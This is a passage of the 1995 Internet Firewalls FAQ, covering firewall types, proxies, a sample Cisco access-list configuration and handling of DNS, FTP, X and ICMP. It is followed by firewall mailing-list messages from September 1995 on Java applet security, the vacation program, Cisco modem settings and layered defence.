to both approaches, with the proxy machine providing a greater level of audit and potentially security in return for increased cost in configuration and a decrease in the level of service that may be provided (since a proxy needs to be developed for each desired service). The old trade-off between ease-of-use and security comes back to haunt us with a vengeance. What are the basic types of firewalls? Conceptually, there are two types of firewalls: * Network Level * Application Level They are not as different as you might think, and latest technologies are blurring the distinction to the point where it's no longer clear if either one is "better" or "worse." As always, you need to be careful to pick the type that meets your needs. Network level firewalls generally make their decisions based on the source, destination addresses and ports in individual IP packets. A simple router is the "traditional" network level firewall, since it is not able to make particularly sophisticated decisions about what a packet is actually talking to or where it actually came from. Modern network level firewalls have become increasingly sophisticated, and now maintain internal information about the state of connections passing through them, the contents of some of the data streams, and so on. One thing that's an important distinction about many network level firewalls is that they route traffic directly though them, so to use one you usually need to have a validly assigned IP address block. Network level firewalls tend to be very fast and tend to be very transparent to users. [Image] Example Network level firewall: In this example, a network level firewall called a "screened host firewall" is represented. In a screened host firewall, access to and from a single host is controlled by means of a router operating at a network level. The single host is a bastion host; a highly-defended and secured strong-point that (hopefully) can resist attack. [Image] Example Network level firewall: In this example, a network level firewall called a "screened subnet firewall" is represented. In a screened subnet firewall, access to and from a whole network is controlled by means of a router operating at a network level. It is similar to a screened host, except that it is, effectively, a network of screened hosts. Application level firewalls generally are hosts running proxy servers, which permit no traffic directly between networks, and which perform elaborate logging and auditing of traffic passing through them. Since the proxy applications are sopftware components running on the firewall, it is a good place to do lots of logging and access control. Application level firewalls can be used as network address translators, since traffic goes in one "side" and out the other, after having passed through an application that effectively masks the origin of the initiating connection. Having an application in the way in some cases may impact performance and may make the firewall less transparent. Early application level firewalls such as those built using the TIS firewall toolkit, are not particularly transparent to end users and may require some training. Modern application level firewalls are often fully transparent. Application level firewalls tend to provide more detailed audit reports and tend to enforce more conservative security models than network level firewalls. [Image] Example Application level firewall: In this example, an application level firewall called a "dual homed gateway" is represented. A dual homed gateway is a highly secured host that runs proxy software. It has two network interfaces, one on each network, and blocks all traffic passing through it. The Future of firewalls lies someplace between network level firewalls and application level firewalls. It is likely that network level firewalls will become increasingly "aware" of the information going through them, and application level firewalls will become increasingly "low level" and transparent. The end result will be a fast packet-screening system that logs and audits data as it passes through. Increasingly, firewalls (network and application layer) incorporate encryption so that they may protect traffic passing between them over the Internet. Firewalls with end-to-end encryption can be used by organizations with multiple points of Internet connectivity to use the Internet as a "private backbone" without worrying about their data or passwords being sniffed. What are proxy servers and how do they work? A proxy server (sometimes referred to as an application gateway or forwarder) is an application that mediates traffic between a protected network and the Internet. Proxies are often used instead of router-based traffic controls, to prevent traffic from passing directly between networks. Many proxies contain extra logging or support for user authentication. Since proxies must "understand" the application protocol being used, they can also implement protocol specific security (e.g., an FTP proxy might be configurable to permit incoming FTP and block outgoing FTP). Proxy servers are application specific. In order to support a new protocol via a proxy, a proxy must be developed for it. One popular set of proxy servers is the TIS Internet Firewall Toolkit ("FWTK") which includes proxies for Telnet, rlogin, FTP, X-Window, http/Web, and NNTP/Usenet news. SOCKS is a generic proxy system that can be compiled into a client-side application to make it work through a firewall. Its advantage is that it's easy to use, but it doesn't support the addition of authentication hooks or protocol specific logging. For more information on SOCKS, see ftp.nec.com: /pub/security/socks.cstc Users are encouraged to check the file "FILES" for a description of the directory's contents. What are some cheap packet screening tools? The Texas AMU security tools include software for implementing screening routers (FTP net.tamu.edu, pub/security/TAMU). Karlbridge is a PC-based screening router kit ftp://ftp.net.ohio-state.edu/pub/kbridge. A version of the Digital Equipment Corporation "screend" kernel screening software is available for BSD/386, NetBSD, and BSDI. Many commercial routers support screening of various forms. What are some reasonable filtering rules for a Cisco? The following example shows one possible configuration for using the Cisco as a filtering router. It is a sample that shows the implementation of a specific policy. Your policy will undoubtedly vary. [Image] In this example, a company has Class B network address of 128.88.0.0 and is using 8 bits for subnets. The Internet connection is on the "red" subnet 128.88.254.0. All other subnets are considered trusted or "blue" subnets. Keeping the following points in mind will help in understanding the configuration fragments: 1. In these rules the Ciscos are applying filtering to output packets only. 2. Rules are tested in order and stop when the first match is found. 3. There is an implicit deny rule at the end of an access list that denies everything. The example below concentrates on the filtering parts of a configuration. Line numbers and formatting have been added for readability. The policy to be implemented is: * Anything not explicitly allowed is denied * Traffic between the external gateway machine and blue net hosts is allowed. * Permit services orginating from the blue net. * Allow a range of ports for FTP data connections back to the blue net. 1. no ip source-route 2. ! 3. interface Ethernet 0 4. ip address 128.88.254.3 255.255.255.0 5. ip access-group 10 6. ! 7. interface Ethernet 1 8. ip address 128.88.1.1 255.255.255.0 9. ip access-group 11 10. ! 11. access-list 10 permit ip 128.88.254.2 0.0.0.0 128.88.0.0 0.0.255.255 12. access-list 10 deny tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 lt 1025 13. access-list 10 deny tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 gt 4999 14. access-list 10 permit tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 15. ! 16. access-list 11 permit ip 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255 17. access-list 11 deny tcp 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 25 18. access-list 11 permit tcp 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255 Explanation * No Ip source-route: Although this is not a filtering rule, it is good to include here. The no Ip source-route directive tells the router to drop all source-routed packets. * ip access-group 10: Ethernet 0 is on the red net. Extended access list 10 will be applied to output on this interface. You can also think of output from the red net as input on the blue net. * ip access-group 11: Ethernet 1 is on the blue net. Extended access list 11 will be applied to output on this interface. * Permit ip 128.88.254.2: Allow all traffic from the gateway machine to the blue net. * access-list 10 permit tcp: Allow connections originating from the red net that come in between ports 1024 and 5000. This is to allow ftp data connections back into the blue net. 5000 was chosen as the upper limit as it is where OpenView starts. Note: again, we are assuming this is acceptable for the given policy. There is no way to tell a Cisco to filter on source port. Newer versions of the Cisco firmware will apparently support source port filtering. Since the rules are tested until the first match we must use this rather obtuse syntax * access-list 11 permit ip: Allow all blue net packets to the gateway machine. * access-list 11 deny tcp: Deny SMTP (tcp port 25) mail to the red net. * access-list 11 permit tcp: Allow all other TCP traffic to the red net. Cisco.Com has an archive of examples for building firewalls using Cisco routers, available for FTP from: ftp.cisco.com in /pub/acl-examples.tar.Z Newer revisions of the Cisco firmware (starting at 9.21) allow the administrator to specify packet filtering on inbound or outbound packets. How do I make Web/HTTP work through my firewall? There are 3 ways to do it - Pick one: * Allow "established" connections out via a router, if you are using screening routers. * Use a Web client that supports SOCKS, and run SOCKS on your firewall. * Run some kind of proxy-capable Web server on the firewall. The TIS firewall toolkit includes a proxy called http-gw, which proxies Web, gopher/gopher+ and FTP. CERN httpd also has a proxy capability, which many sites use in combination with the server's ability to cache frequently accessed pages. Many Web clients have proxy server support (Netscape, Mosaic, Spry, Chameleon, etc) built directly into them. How do I make DNS work with a firewall? Some organizations want to hide DNS names from the outside. Many experts don't think hiding DNS names is worthwhile, but if site/corporate policy mandates hiding domain names, this is one approach that is known to work. Another reason you may have to hide domain names is if you have a non-standard addressing scheme on your internal network. In that case, you have no choice but to hide those addresses. Don't fool yourself into thinking that if your DNS names are hidden that it will slow an attacker down much if they break into your firewall. Information about what is on your network is too easily gleaned from the networking layer itself. If you want an interesting demonstration of this, ping the subnet broadcast address on your LAN and then do an "arp -a." Note also that hiding names in the DNS doesn't address the problem of host names "leaking" out in mail headers, news articles, etc. This approach is one of many, and is useful for organizations that wish to hide their host names from the Internet. The success of this approach lies on the fact that DNS clients on a machine don't have to talk to a DNS server on that same machine. In other words, just because there's a DNS server on a machine, there's nothing wrong with (and there are often advantages to) redirecting that machine's DNS client activity to a DNS server on another machine. First, you set up a DNS server on the bastion host that the outside world can talk to. You set this server up so that it claims to be authoritative for your domains. In fact, all this server knows is what you want the outside world to know; the names and addresses of your gateways, your wildcard MX records, and so forth. This is the "public" server. Then, you set up a DNS server on an internal machine. This server also claims to be authoritiative for your domains; unlike the public server, this one is telling the truth. This is your "normal" nameserver, into which you put all your "normal" DNS stuff. You also set this server up to forward queries that it can't resolve to the public server (using a "forwarders" line in /etc/named.boot on a UNIX machine, for example). Finally, you set up all your DNS clients (the /etc/resolv.conf file on a UNIX box, for instance), including the ones on the machine with the public server, to use the internal server. This is the key. An internal client asking about an internal host asks the internal server, and gets an answer; an internal client asking about an external host asks the internal server, which asks the public server, which asks the Internet, and the answer is relayed back. A client on the public server works just the same way. An external client, however, asking about an internal host gets back the "restricted" answer from the public server. This approach assumes that there's a packet filtering firewall between these two servers that will allow them to talk DNS to each other, but otherwise restricts DNS between other hosts. Another trick that's useful in this scheme is to employ wildcard PTR records in your IN-ADDR.ARPA domains. These cause an an address-to-name lookup for any of your non- public hosts to return something like "unknown.YOUR.DOMAIN" rather than an error. This satisfies anonymous FTP sites like ftp.uu.net that insist on having a name for the machines they talk to. This may fail when talking to sites that do a DNS cross-check in which the host name is matched against its address and vice versa. How do I make FTP work through my firewall? Generally, making FTP work through the firewall is done either using a proxy server such as the firewall toolkit's ftp-gw or by permitting incoming connections to the network at a restricted port range, and otherwise restricting incoming connections using something like "established" screening rules. The FTP client is then modified to bind the data port to a port within that range. This entails being able to modify the FTP client application on internal hosts. In some cases, if FTP downloads are all you wish to support, you might want to consider declaring FTP a "dead protocol" and letting you users download files via the Web instead. The user interface certainly is nicer, and it gets around the ugly callback port problem. If you choose the FTP-via-Web approach, your users will be unable to FTP files out, which, depending on what you are trying to accomplish, may be a problem. A different approach is to use the FTP "PASV" option to indicate that the remote FTP server should permit the client to initiate connections. The PASV approach assumes that the FTP server on the remote system supports that operation. (See RFC1579 for more information) Other sites prefer to build client versions of the FTP program that are linked against a SOCKS library. How do I make Telnet work through my firewall? Telnet is generally supported either by using an application proxy such as the firewall toolkit's tn-gw, or by simply configuring a router to permit outgoing connections using something like the "established" screening rules. Application proxies could be in the form of a standalone proxy running on the bastion host, or in the form of a SOCKS server and a modified client. How do I make Finger and whois work through my firewall? Many firewall admings permit connections to the finger port from only trusted machines, which can issue finger requests in the form of: finger user@host.domain@firewall. This approach only works with the standard UNIX version of finger. Controlling access to services and restricting them to specific machines is managed using either tcp_wrappers or netacl from the firewall toolkit. This approach will not work on all systems, since some finger servers do not permit user@host@host fingering. Many sites block inbound finger requests for a variety of reasons, foremost being past security bugs in the finger server (the Morris internet worm made these bugs famous) and the risk of proprietary or sensitive information being revealed in user's finger information. In general, however, if your users are accostomed to putting proprietary or sensitive information in their.plan files, you have a more serious security problem than just a firewall can solve. How do I make gopher, archie, and other services work through my firewall? The majority of firewall administrators choose to support gopher and archie through Web proxies, instead of directly. Proxies such as the firewall toolkit's http-gw convert gopher/gopher+ queries into HTML and vice versa. For supporting archie and other queries, many sites rely on Internet-based Web-to-archie servers, such as ArchiePlex. The Web's tendency to make everything on the Internet look like a Web service is both a blessing and a curse. There are many new services constantly cropping up. Often they are misdesigned or are not designed with security in mind, and their designers will cheerfully tell you if you want to use them you need to let port xxx through your router. Unfortunately, not everyone can do that, and so a number of interesting new toys are difficult to use for people behind firewalls. Things like RealAudio, which require direct UDP access, are particularly egregious examples. The thing to bear in mind if you find yourself faced with one of these problems is to find out as much as you can about the security risks that the service may present, before you just allow it through. It's quite possible the service has no security implications. It's equally possible that it has undiscovered holes you could drive a truck through. What are the issues about X-Window through a firewall? X Windows is a very useful system, but unfortunately has some major security flaws. Remote systems that can gain or spoof access to a workstation's X display can monitor keystrokes that a user enters, download copies of the contents of their windows, etc. While attempts have been made to overcome them (E.g., MIT "Magic Cookie") it is still entirely too easy for an attacker to interfere with a user's X display. Most firewalls block all X traffic. Some permit X traffic through application proxies such as the DEC CRL X proxy (FTP crl.dec.com). The firewall toolkit includes a proxy for X, called x-gw, which a user can invoke via the Telnet proxy, to create a virtual X server on the firewall. When requests are made for an X connection on the virtual X server, the user is presented with a pop-up asking them if it is OK to allow the connection. While this is a little unaesthetic, it's entirely in keeping with the rest of X. What is source routed traffic and why is it a threat? Normally, the route a packet takes from its source to its destination is determined by the routers between the source and destination. The packet itself only says where it wants to go (the destination address), and nothing about how it expects to get there. There is an optional way for the sender of a packet (the source) to include information in the packet that tells the route the packet should get to its destination; thus the name "source routing". For a firewall, source routing is noteworthy, since an attacker can generate traffic claiming to be from a system "inside" the firewall. In general, such traffic wouldn't route to the firewall properly, but with the source routing option, all the routers between the attacker's machine and the target will return traffic along the reverse path of the source route. Implementing such an attack is quite easy; so firewall builders should not discount it as unlikely to happen. In practice, source routing is very little used. In fact, generally the main legitimate use is in debugging network problems or routing traffic over specific links for congestion control for specialized situations. When building a firewall, source routing should be blocked at some point. Most commercial routers incorporate the ability to block source routing specifically, and many versions of UNIX that might be used to build firewall bastion hosts have the ability to disable or ignore source routed traffic. What are ICMP redirects and redirect bombs? An ICMP Redirect tells the recipient system to over-ride something in its routing table. It is legitimately used by routers to tell hosts that the host is using a non-optimal or defunct route to a particular destination, i.e. the host is sending it to the wrong router. The wrong router sends the host back an ICMP Redirect packet that tells the host what the correct route should be. If you can forge ICMP Redirect packets, and if your target host pays attention to them, you can alter the routing tables on the host and possibly subvert the security of the host by causing traffic to flow via a path the network manager didn't intend. ICMP Redirects also may be employed for denial of service attacks, where a host is sent a route that loses it connectivity, or is sent an ICMP Network Unreachable packet telling it that it can no longer access a particular network. Many firewall builders screen ICMP traffic from their network, since it limits the ability of outsiders to ping hosts, or modify their routing tables. What about denial of service? Denial of service is when someone decides to make your network or firewall useless by disrupting it, crashing it, jamming it, or flooding it. The problem with denial of service on the Internet is that it is impossible to prevent. The reason has to do with the distributed nature of the network: every network node is connected via other networks which in turn connect to other networks, etc. A firewall administrator or ISP only has control of a few of the local elements within reach. An attacker can always disrupt a connection "upstream" from where the victim controls it. In other words, if someone wanted to take a network off the air, they could do it either by taking the network off the air, or by taking the networks it connects to off the air, ad infinitum. There are many, many, ways someone can deny service, ranging from the complex to the brute-force. If you are considering using Internet for a service which is absolutely time or mission critical, you should consider your fall-back position in the event that the network is down or damaged. Glossary of firewall related terms Abuse of Privilege: When a user performs an action that they should not have, according to organizational policy or law. Application-Level Firewall: A firewall system in which service is provided by processes that maintain complete TCP connection state and sequencing. Application level firewalls often re-address traffic so that outgoing traffic appears to have originated from the firewall, rather than the internal host. Authentication: The process of determining the identity of a user that is attempting to access a system. Authentication Token: A portable device used for authenticating a user. Authentication tokens operate by challenge/response, time-based code sequences, or other techniques. This may include paper-based lists of one-time passwords. Authorization: The process of determining what types of activities are permitted. Usually, authorization is in the context of authentication: once you have authenticated a user, they may be authorized different types of access or activity. Bastion Host: A system that has been hardened to resist attack, and which is installed on a network in such a way that it is expected to potentially come under attack. Bastion hosts are often components of firewalls, or may be "outside" Web servers or public access systems. Generally, a bastion host is running some form of general purpose operating system (e.g., UNIX, VMS, WNT, etc.) rather than a ROM-based or firmware operating system. Challenge/Response: An authentication technique whereby a server sends an unpredictable challenge to the user, who computes a response using some form of authentication token. Chroot: A technique under UNIX whereby a process is permanently restricted to an isolated subset of the filesystem. Cryptographic Checksum: A one-way function applied to a file to produce a unique "fingerprint" of the file for later reference. Checksum systems are a primary means of detecting filesystem tampering on UNIX. Data Driven Attack: A form of attack in which the attack is encoded in innocuous-seeming data which is executed by a user or other software to implement an attack. In the case of firewalls, a data driven attack is a concern since it may get through the firewall in data form and launch an attack against a system behind the firewall. Defense in Depth: The security approach whereby each system on the network is secured to the greatest possible degree. May be used in conjunction with firewalls. DNS spoofing: Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain. Dual Homed Gateway: A dual homed gateway is a system that has two or more network interfaces, each of which is connected to a different network. In firewall configurations, a dual homed gateway usually acts to block or filter some or all of the traffic trying to pass between the networks. Encrypting Router: see Tunneling Router and Virtual Network Perimeter. Firewall: A system or combination of systems that enforces a boundary between two or more networks. Host-based Security: The technique of securing an individual system from attack. Host based security is operating system and version dependent. Insider Attack: An attack originating from inside a protected network. Intrusion Detection: Detection of break-ins or break-in attempts either manually or via software expert systems that operate on logs or other information available on the network. IP Spoofing: An attack whereby a system attempts to illicitly impersonate another system by using its IP network address. IP Splicing / Hijacking: An attack whereby an active, established, session is intercepted and co-opted by the attacker. IP Splicing attacks may occur after an authentication has been made, permitting the attacker to assume the role of an already authorized user. Primary protections against IP Splicing rely on encryption at the session or network layer. Least Privilege: Designing operational aspects of a system to operate with a minimum amount of system privilege. This reduces the authorization level at which various actions are performed and decreases the chance that a process or user with high privileges may be caused to perform unauthorized activity resulting in a security breach. Logging: The process of storing information about events that occurred on the firewall or network. Log Retention: How long audit logs are retained and maintained. Log Processing: How audit logs are processed, searched for key events, or summarized. Network-Level Firewall: A firewall in which traffic is examined at the network protocol packet level. Perimeter-based Security: The technique of securing a network by controlling access to all entry and exit points of the network. Policy: Organization-level rules governing acceptable use of computing resources, security practices, and operational procedures. Proxy: A software agent that acts on behalf of a user. Typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps does additional authentication, and then completes a connection on behalf of the user to a remote destination. Screened Host: A host on a network behind a screening router. The degree to which a screened host may be accessed depends on the screening rules in the router. Screened Subnet: A subnet behind a screening router. The degree to which the subnet may be accessed depends on the screening rules in the router. Screening Router: A router configured to permit or deny traffic based on a set of permission rules installed by the administrator. Session Stealing: See IP Splicing. Trojan Horse: A software entity that appears to do something normal but which, in fact, contains a trapdoor or attack program. Tunneling Router: A router or system capable of routing traffic by encrypting it and encapsulating it for transmission across an untrusted network, for eventual de-encapsulation and decryption. Social Engineering: An attack based on deceiving users or administrators at the target site. Social engineering attacks are typically carried out by telephoning users or operators and pretending to be an authorized user, to attempt to gain illicit access to systems. Virtual Network Perimeter: A network that appears to be a single protected network behind firewalls, which actually encompasses encrypted virtual links over untrusted networks. Virus: A self-replicating code segment. Viruses may or may not contain attack programs or trapdoors. Contributors: * Primary Author: mjr@iwi.com - Marcus Ranum, Information Warehouse! * Cisco Config: allen@msen.com - Allen Leibowitz * DNS Hints: brent@greatcircle.com - Brent Chapman, Great Circle Associates * Policy Brief: bdboyle@erenj.com - Brian Boyle, Exxon Research Copyright(C) 1995 Marcus J. Ranum. All rights reserved. This document may be used, reprinted, and redistributed as is providing this copyright notice and all attributions remain intact. From firewalls-owner Fri Sep 15 14:32:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27503 for firewalls-outgoing; Fri, 15 Sep 1995 14:21:56 -0700 Received: from pondscum.phx.mcd.mot.com (pondscum.phx.mcd.mot.com [144.191.36.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA27489 for ; Fri, 15 Sep 1995 14:21:47 -0700 Received: from pondscum.phx.mcd.mot.com (localhost [127.0.0.1]) by pondscum.phx.mcd.mot.com (8.6.8.p4/8.6.3.pondscum) with ESMTP id OAA19001;Fri, 15 Sep 1995 14:16:56 -0700 Message-Id: <199509152116.OAA19001@pondscum.phx.mcd.mot.com> To: firewalls@greatcircle.com Cc: cmcmanis@scndprsn.eng.sun.com (Chuck McManis) Subject: Re: I wish Java would go away ... In-reply-to: Your message of "Fri, 15 Sep 1995 10:38:42 MST." <9509151738.AA19548@pepper.Eng.Sun.COM> Date: Fri, 15 Sep 1995 14:16:53 -0700 From: Kevin Johnson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> Chuck McManis writes: > Scott writes: >> I was wondering if anyone has done a security analysis of allowing >> Java applets behind a firewall? > And the answer is of course yes. We plan to have a more thorough > security analysis paper available for FCS. In the meantime we > welcome other analyses and comments. Can you please provide a pointer to existing security analysis documentation for those of us that haven't had a chance to go scrounging for it. >> (b) I saw a lot of stuff regarding these applets and Unix, but what >> if the client machines are pee cees? The NT and Windoze 95 weenies >> are jumping up and down going "oooo neat!" I'm still responding >> "oy vey!" :-) > Interestingly enough the language is the same on PCs as it is on > UNIX. It is still impossible to express a virus in Java, and it is > still impossible to cons up some illegal byte codes and have them > executed by the virtual machine on the other end. If you have any > specific concerns I can address then please feel free to write or > post to the java lists. 'impossible' is such an interesting word to fling around security folks... Please provide a pointer to information that details how it is 'impossible to express a virus'. -- thx, kjj From firewalls-owner Fri Sep 15 14:32:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27263 for firewalls-outgoing; Fri, 15 Sep 1995 14:18:35 -0700 Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA27251 for ; Fri, 15 Sep 1995 14:18:28 -0700 Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id OAA18185 for greatcircle.com!Firewalls; Fri, 15 Sep 1995 14:10:41 -0600 From: Shawn Steele Message-Id: <9509151323.ZM4018@aob.org> Date: Fri, 15 Sep 1995 13:23:06 -0600 In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V4 #530" (Sep 15, 9:03am) References: <199509151603.JAA08002@miles.greatcircle.com> X-Mailer: Z-Mail Lite (3.2.0 26may94) To: Firewalls@greatcircle.com Subject: Re: Any known security holes in the "vacation" program Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > sjs writes: > > I'm trying to set up an auto-responder for a couple of mail > > aliases on my mailhost. For the moment, because I don't really want > > to get involved with majordomo or any of the other mail list > > programs, I am using the simple functionality of the > > "/usr/ucb/vacation" program under SunOS 4.1.x. > > I wouldn't recommend it. vacation can write to files in the users > home directory writing an rhosts entry jumps to mind. If all you are looking for is an auto-responder, it usually isn't very difficult to create a small program to scan for From: & Reply-To: addresses and send a preformated response. You'd have the advantages that the code would be small and also fairly unknown to any potential hacker types out there. - shawn Shawn Steele Information Systems Administrator Association of Brewers (303) 447-0816 x 118 (voice) 736 Pearl Street (303) 447-2825 (fax) PO Box 1679 shawn@aob.org (e-mail) Boulder, CO 80306-1679 info@aob.org (aob info) U.S.A. http://www.aob.org/aob (web) Note: When replying to my messages, please include enough of my message so that I know what you're replying to! :-) From firewalls-owner Fri Sep 15 15:01:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00136 for firewalls-outgoing; Fri, 15 Sep 1995 14:52:40 -0700 Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA00126 for ; Fri, 15 Sep 1995 14:52:35 -0700 Received: by london.micrognosis.com (4.1/NAR-Gateway) id AA01516; Fri, 15 Sep 95 22:51:17 BST Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) id sma001511; Fri Sep 15 22:50:47 1995 Received: by zeus.london.micrognosis.com (4.1/SMI-4.1) id AA14249; Fri, 15 Sep 95 22:50:44 BST From: nreadwin@london.micrognosis.com (Neil Readwin) Message-Id: <9509152150.AA14249@zeus.london.micrognosis.com> Subject: Re: Any known security holes in the "vacation" program To: yevaud@netcom.com (Karl Wiebe) Date: Fri, 15 Sep 1995 22:50:43 +0100 (BST) Cc: firewalls@greatcircle.com In-Reply-To: <199509151653.JAA18708@netcom21.netcom.com> from "Karl Wiebe" at Sep 15, 95 09:53:51 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 704 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >[...] the "/usr/ucb/vacation" program under SunOS 4.1.x. > > One reason is simply that vacation, being designed for the simple "I'm on > vacation" setup, will only respond *once* to email from a given address; > this is why it maintains its "database". But it only maintains the database if you create it first. Otherwise it replies to every mail. Try it - set up a 'dead' account and change the .forward to run vacation. Ignore for weeks until a cron job for the account sends mail to the owner. Notice how rapidly /var/log fills up with sendmail syslog output. Neil. -- nreadwin@micrognosis.co.uk Phone: +1 908 855 1221 x519 Anything is a cause for sorrow that my mind or body has made From firewalls-owner Fri Sep 15 15:02:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29984 for firewalls-outgoing; Fri, 15 Sep 1995 14:51:34 -0700 Received: from stilton.cisco.com (stilton.cisco.com [171.69.1.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA29933 for ; Fri, 15 Sep 1995 14:51:20 -0700 Received: from cisco.com (localhost.cisco.com [127.0.0.1]) by stilton.cisco.com (8.6.8+c/8.6.5) with ESMTP id OAA21399; Fri, 15 Sep 1995 14:49:45 -0700 Message-Id: <199509152149.OAA21399@stilton.cisco.com> To: mramirez@imparcial.com.mx Cc: firewalls@GreatCircle.COM Subject: Re: Help with CISCO 2511 In-Reply-To: Your message of "Tue, 12 Sep 1995 22:39:43 MDT." Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Id: <21396.811201785.1@cisco.com> Date: Fri, 15 Sep 1995 14:49:45 -0700 From: David Carrel Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What they wanted to tell you (or meant to tell you, or tried to tell you) is that you need to set the lines on the 2511 to a speed higher than 9600. The default speed is 9600. Check out your manual and find out what the maximum DTE speed is for the modem. It's probably 57600 baud. Then configure that on the 2511 for all lines: config# line tty 1 16 config-line# speed 57600 The modems will then talk at 57.600 to the 2511. The modems will never negotiate a speed higher than the DTE speed. Dave > I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX)= > . > I=B4m having problems trying to configure the receiving modems to support > 14,400 bps from the callers. > Actually my users only can connect to the modems at 9600 bps, and the > technical support from CISCO told me that I have to change my modems to > 28,800 bps, that=B4s the only way that my receiving modems can receive calls > at 14,400 bps. > It=B4s true?? , because I think that is some problem with the configuration > of the CISCO (in dedicated or interactive mode) From firewalls-owner Fri Sep 15 15:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27998 for firewalls-outgoing; Fri, 15 Sep 1995 14:29:45 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA27985 for ; Fri, 15 Sep 1995 14:29:39 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA17081; Fri, 15 Sep 95 17:04:48 -0400 Date: Fri, 15 Sep 95 17:04:48 -0400 Message-Id: <9509152104.AA17081@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Multiple Levels of Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark rites: >----------------- 1) strong authentication and identification 2) session security (could be encryption either at the link or session level) 3) perimeter LAN security firewalls around the LAN perimeter. 4) application level security: -language support for security -application level auditing -secure databases 5) host security -system level auditing -compartmentalization of applications -protection of user from user -protection of application from application -protection of underlying OS -intrusion detection 6) physical security of plant/property & equipment 7) security training of peronnel (essential) >----------------------------------- Good separation and I agree with universal needs for 1-3 and 6-7 but relegate 4 & 5 to an "as needed" basis. Is a matter of resources. I can see where a small organization may be able to handle all of these elements but it is just not possible for a large organization to provide 4 & 5 to every workstation. As a result, I have found it necessary to manage large groups of systems at the subnet/department/project level and allow the group autonomy within that boundary. The concept of a "perimeter defense" is based on defining a defensible perimenter given the current assets. Squares/rectangles are the usual choice because they allow redundant control to be placed at the corners *with the least expended manpower*. As anyone who has been in the field knows, you do the best you can with what you have. Strategic planning is not done while carrying out tactical operations (beyond "I ain't gonna do THAT again.") Now I have never said that internal protection is unnecessary, really have not had that much time to go into it since without a strong perimeter, internal patrolling is not going to help much. There is a place for an internal patrol/protection but it is much different and has the *luxury* of a different mindset than necessary on the walls. Diplomacy is possible. Have said for some time that it is possible to have trusted subnets that have the function of a bastion while residing "inside". On these 4 & 5 are applicable. But first a strong perimeter is needed. Warmly, Padgett From firewalls-owner Fri Sep 15 15:40:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02040 for firewalls-outgoing; Fri, 15 Sep 1995 15:24:56 -0700 Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA02032 for ; Fri, 15 Sep 1995 15:24:51 -0700 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id PAA28031; Fri, 15 Sep 1995 15:23:25 -0700 Received: from scndprsn.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA04536; Fri, 15 Sep 1995 15:23:20 -0700 Received: from pepper.Eng.Sun.COM by scndprsn.Eng.Sun.COM (5.x/SMI-SVR4) id AA15941; Fri, 15 Sep 1995 15:23:19 -0700 Received: by pepper.Eng.Sun.COM (5.x/SMI-SVR4) id AA20137; Fri, 15 Sep 1995 15:24:15 -0700 Date: Fri, 15 Sep 1995 15:24:15 -0700 From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis) Message-Id: <9509152224.AA20137@pepper.Eng.Sun.COM> To: firewalls@greatcircle.com, kjj@pondscum.phx.mcd.mot.com Subject: Re: I wish Java would go away ... Cc: cmcmanis@scndprsn.Eng.Sun.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> And the answer is of course yes. We plan to have a more thorough >> security analysis paper available for FCS. In the meantime we >> welcome other analyses and comments. > >Can you please provide a pointer to existing security analysis >documentation for those of us that haven't had a chance to go >scrounging for it. Let me restate what I said, our security analyses of the system will be available from our home page. However, Scott (and others) seemed to indicate they were interested in NON-Sun analysis (since we are of course biased) Several third parties have said they would be analyzing our security, but unfortunatly no one has yet shared this analysis with us. (Well one party did but they expressly asked that their analysis be kept confidential for non-security related reasons) >'impossible' is such an interesting word to fling around security >folks... 